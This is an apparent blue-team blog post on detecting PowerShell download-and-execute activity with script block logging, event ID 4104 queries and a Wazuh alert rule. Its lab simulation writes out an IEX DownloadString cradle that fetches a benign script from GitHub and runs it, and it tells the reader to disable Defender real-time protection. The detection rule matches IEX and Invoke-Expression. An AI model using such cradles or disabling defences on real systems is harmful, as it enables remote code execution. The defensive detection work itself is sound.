Post

Detecting Malicious Script Execution in PowerShell

Posted Updated
Preview Image
By lr2t9iz 2 min read

PowerShell, a powerful Windows command-line shell and scripting language, is often abused by adversaries to execute malicious scripts and commands, one of the most commonly used techniques according to redcanary.

We will explore how attackers leverage PowerShell’s capabilities to carry out their intrusions, such as those seen in recent REF4578 intrusions revealed by Elastic Security Labs and Antiy.

image @elasticseclabs

Execution in PowerShell

T1059.001: PowerShell, This technique is post-exploitation, meaning that the attacker already has access to a machine and will execute their scripts, similar to the approach used in GhostEngine mining attacks.

image Source: Elastic Security Labs Download and Excecute a PowerShell Script

Collection

Enabling PowerShell logging is crucial for effective detection of malicious activities. By default, Windows has PowerShell logging disabled, which can hinder our ability to monitor and respond to threats. By configuring detailed logging, we can capture information about every script block and command executed in PowerShell.

  • Open a PowerShell as Administrator and run the following commands
    1
2
3

    $basePath = "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"
if (-not (Test-Path $basePath)) { $null = New-Item $basePath -Force }
Set-ItemProperty $basePath -Name EnableScriptBlockLogging -Value "1"

Simulation

For the simulation, we will execute a command line in Cmd to observe how it is logged and detected in lab host. To ensure the commands are executed without interference, we will temporarily disable Windows Defender’s real-time protection for testing purposes. This will help us understand the logging process and identify key indicators of potentially malicious activity.

1

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/lr2t9iz/PowershellScriptsHub/main/hello_world.ps1');"
  • Output image

Result

To look up for malicious script execution, we will use the following PowerShell command to query the event logs.

1
2
3

Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" `
-FilterXPath '*[System[EventID=4104]]' | Sort-Object -Property TimeCreated `
| Where-Object {$_.ToXml().Contains("hello_world")} | fl
  • Result image

Detection

To do the detection we must have a S1EM ready. if you don’t have it yet you can create it following these steps, Wazuh S1EM

Search for the event in the S1EM

  • Wazuh ﹀ Modules > Security events
  • Put the following query in the search bar and click on Update
    1

    data.win.system.channel:"Microsoft-Windows-PowerShell/Operational" AND data.win.system.message:*hello_world*
  • Query Result image
  • To see the content of the script, click on the + sign of the processID.

image image

  • To receive an alert we will modify the rule, id 91837.
1
2
3
4
5
6
7
8
9
10
11

<!-- aaa_w1n_overwrite.xml rule file + + + + + -->
<group name="al3rt,">
  <rule id="91837" level="4" overwrite="yes">
    <if_sid>91802</if_sid>
    <field name="win.eventdata.scriptBlockText" type="pcre2">(?i)(Get-Content.+\-Stream|IEX|Invoke-Expresion)</field>
    <group>windows,powershell,</group>
    <description>Powershell executed "Get-Content -Stream or Invoke-Expresion". Possible string execution as code</description>
    <options>no_full_log</options>
    <mitre> <id>T1059.001</id> </mitre>
  </rule>
</group>
  • The rule is located in the following repository.
  • As a result, we will receive a slack alert to detect the powershell execution. image
blueteam, detection
difficulty:low endpoint os:windows
This post is licensed under CC BY 4.0 by the author.